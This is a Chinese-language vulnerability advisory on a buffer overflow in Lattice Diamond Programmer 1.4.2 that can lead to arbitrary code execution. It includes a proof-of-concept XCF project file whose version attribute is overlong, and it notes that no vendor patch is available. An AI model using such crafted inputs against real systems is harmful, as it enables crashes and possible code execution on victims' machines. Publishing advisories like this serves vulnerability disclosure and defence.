Lattice Diamond Programmer缓冲区溢出漏洞

Lattice Diamond Programmer缓冲区溢出漏洞

发布日期：2012-06-21
更新日期：2012-08-23

受影响系统：
Lattice Semiconductor Diamond Programmer
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54149

Lattice Diamond是一款FPGA设计软件工具套件。

Diamond Programmer 1.4.2及其他版本在实现上存在缓冲区溢出漏洞，攻击者可利用此漏洞执行任意代码。

<*来源：Daniel Kazimirow
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Daniel Kazimirow （）提供了如下测试方法：

/-----
<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE        ispXCF    SYSTEM    "IspXCF.dtd" >
<ispXCF
version="8.9.09.09999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
    <Comment></Comment>
    <Chain>
        <Comm>JTAG</Comm>
        <Device>
            <Pos>1</Pos>
            <Vendor>Lattice</Vendor>
            <Family>ispLSI 5000VE</Family>
            <Name>5256VE</Name>
            <IDCode>0x00368043</IDCode>
            <Package>128-pin TQFP</Package>
            <PON>ispLSI5256VE-XXLT128</PON>
            <Bypass>
                <InstrLen>5</InstrLen>
                <InstrVal>11111</InstrVal>
                <BScanLen>1</BScanLen>
                <BScanVal>0</BScanVal>
            </Bypass>
            <File>C:\ispTOOLS\ispvmsystem\TutorialU6vea.jed</File>
            <FileTime>05/17/02 18:15:33</FileTime>
            <JedecChecksum>0xF9BD</JedecChecksum>
            <Operation>Erase,Program,Verify</Operation>
            <Option>
                <SVFVendor>JTAG STANDARD</SVFVendor>
                <IOState>HighZ</IOState>
              
<IOVectorData>0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000</IOVectorData>
                <Reinitialize value="TRUE"/>
                <OverideUES value="TRUE"/>
                <TCKFrequency>1.000000 MHz</TCKFrequency>
                <SVFProcessor>ispVM</SVFProcessor>
                <Usercode>0x0000F9BD</Usercode>
            </Option>
        </Device>
    </Chain>
    <ProjectOptions>
        <Program>SEQUENTIAL</Program>
        <Process>ENTIRED CHAIN</Process>
        <OperationOverride>No Override</OperationOverride>
        <StartTAP>TLR</StartTAP>
        <EndTAP>TLR</EndTAP>
        <DeGlitch value="TRUE"/>
        <VerifyUsercode value="TRUE"/>
        <PinSetting>
            TMS    LOW;
            TCK    LOW;
            TDI    LOW;
            TDO    LOW;
            TRST    ABSENT;
            CableEN    HIGH;
        </PinSetting>
    </ProjectOptions>
</ispXCF>
-----/

建议：
--------------------------------------------------------------------------------
厂商补丁：

Lattice Semiconductor
---------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.latticesemi.com/products/designsoftware/programmer/index.cfm